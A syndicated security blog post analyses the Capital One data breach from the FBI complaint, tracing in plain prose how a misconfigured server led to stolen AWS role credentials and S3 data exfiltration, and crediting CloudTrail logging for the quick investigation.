SBN

What We Know About the Capital One Data Breach

Posted under: Research and Analysis

I’m not a fan of dissecting complex data breaches when we don’t have any information. In this case we do know more than usual due to the details in the complaint filed by the FBI.

I want to be very clear that this post isn’t to blame anyone and we have only the most basic information on what happened. The only person worthy of blame here is the attacker.

As many people know Capital One makes heavy us of Amazon Web Services. We know AWS was involved in the attack since the federal complaint specifically mentions S3. But this wasn’t a public S3 bucket.

Again, all from the filed complaint:

  • The attacker discovered a server (likely an instance since it had an IAM role) with a misconfigured firewall. It would also likely have to have a software vulnerability or be related to a credential exposure.
  • The attacker compromised the server and pulled out the IAM role credentials. These are ephemeral credentials that allow AWS API calls. Role credentials are rotated automatically by AWS and are much more secure than using static credentials. However, if you have persistent access you can obviously update your access as needed.
  • Those credentials (an IAM role with “WAF” in the title) allowed listing S3 buckets and read access to at least some of those buckets. This is how the attacker exfiltrated the files.
  • Some buckets (maybe even all) may have been encrypted, and a lot of the data within those files (which included credit card applications) was encrypted or tokenized. Still, the impact was pretty bad.
  • The attacker exfiltrated the data and then discussed it in Slack and on social media.
  • Someone in contact with the attacker saw that information, which including some attack details in GitHub. This person reported it to Capital One through their reporting program.
  • Capital One immediate involved the FBI and very quickly closed the misconfigurations. They also started their own investigation.
  • They were able to determine exactly what happened very quickly, likely through CloudTrail logs. Those contained the commands issued by that IAM role from that server (really easy to filter those). They could then trace back the associated IP addresses. There are a lot of other details on how they found the attacker in the complaint, and it looks like Capital One did quite a bit of the investigation themselves.

So a misconfigured firewall (security group?) > compromised instance > IAM role credential extraction > bucket enumeration > data exfiltrated. Followed by a rapid response and public notification.

As a side note it appears the attacker may have been a former AWS employee but nothing indicates that was a factor in the breach.

Some will say this was a failure of the cloud, but we have seen breaches like this since long before the cloud. If anything the containment and investigation was likely far faster than possible with traditional infrastructure. For example, Capital One didn’t need to worry about the attacker turning off local logging since CloudTrail would capture everything that touched the AWS APIs. Normally we hear about these incidents months or years later, but in this case we went from breach to arrest and disclosure in right around two weeks.

I hope that someday Capital One will be able to talk about the details publicly so the rest of us can learn. No matter how good you are mistakes will happen. The hardest problem in security is solving the simple problems at scale. Because simple doesn’t scale, and what we do is really damn hard to get right all the time.

– Rich
(0) Comments
Subscribe to our daily email digest


*** This is a Security Bloggers Network syndicated blog from Securosis Blog authored by [email protected] (Securosis). Read the original post at: http://securosis.com/blog/what-we-know-about-the-capital-one-data-breach